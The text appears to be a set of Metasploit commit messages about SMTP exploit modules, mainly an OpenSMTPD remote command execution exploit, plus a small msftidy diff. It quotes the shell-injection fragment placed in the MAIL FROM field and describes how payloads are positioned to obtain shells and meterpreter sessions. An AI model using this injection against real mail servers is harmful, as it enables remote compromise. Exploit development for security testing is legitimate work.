changes in #16153 adjusted modules that were not utilizing
`Exploit::Remote::SMTPDeliver` in error restore calls to `raw_send_recv`
that is no longer shadowed by in `SMTPDeliver`.
When dealing with SMTP servers the communication needs to flow
a known protocol. To ensure the socket is in the correct state
after a send and receive it needs to be read until a line return
a response code followed by a `space` and additional data and `\r\n`
or the response code immediately followed by `\r\n` is returned.
For whatever reason, `;for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;` causes an issue with the payload triggering.
Editing `do read` to `do read r`, as taken from the PoC script at https://www.exploit-db.com/exploits/48051, causes the `MAIL_FROM` field to exceed 64 characters.
However, this seems to make 0 difference to the payload, so I commented out the length check.
Reliably working on OpenSMTPd 6.6.0 on an Ubuntu 20.04 host.
Also updates the check to be more precise. I had originally copied the
check method from the Morris worm Sendmail exploit:
220 simh Sendmail 5.51/5.17 ready at Wed, 18 Dec 85 11:14:07 PST
Note that there was no "ESMTP" string in 1985's Sendmail.
The original Qualys exploit uses an inline-shell for loop to read
and thereby consume lines from the input stream preceeding the
intended script for execution in the body section. Payloads which
do not contain bad characters (encoded or coincidentally simple)
can be placed directly into the FROM field and executed in place
of the original for loop filter.
Using method from
https://www.openwall.com/lists/oss-security/2020/01/28/3
Attempted several other line readers via awk, while, for. Tried
without pipes or `>` in the strings. It appears other characters
are also illegal (conditional brackets likely culprits).
Initial testing on wide-open-configured opensmtpd on OpenBSD 6.6
libvirt Vagrant image produces shells, python meterpreter sessions,
and executes generic commands.
Basic msftidy fixer:
diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
# Check disclosure date format
if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
d = $1 #Captured date
+ File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+ fixed('Probably updated traditional DisclosureDate to ISO 8601')
# Flag if overall format is wrong
if d =~ /^... (?:\d{1,2},? )?\d{4}$/
# Flag if month format is wrong
Jeffrey Martin